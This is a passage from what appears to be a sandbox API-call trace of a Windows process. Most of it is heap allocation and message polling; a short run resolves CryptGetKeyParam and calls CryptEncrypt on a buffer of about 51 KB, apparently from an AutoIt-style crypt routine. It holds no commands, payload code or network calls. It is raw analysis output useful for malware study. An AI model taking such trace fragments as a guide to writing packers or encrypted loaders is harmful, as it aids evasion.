hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae948 [0036.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae948, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.320] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.321] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.321] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.321] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.321] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.322] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.322] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.322] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.324] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xcab3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xcac0) returned 1 [0036.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.325] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.325] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.325] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.325] CharLowerBuffW (in: lpsz="byte[51905]", cchLength=0xb | out: lpsz="byte[51905]") returned 0xb [0036.325] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.327] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.328] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x97b058*, pdwDataLen=0x6ae220*=0xcab3, dwBufLen=0xcac0 | out: pbData=0x97b058*, pdwDataLen=0x6ae220*=0xcac0) returned 1 [0036.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.331] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 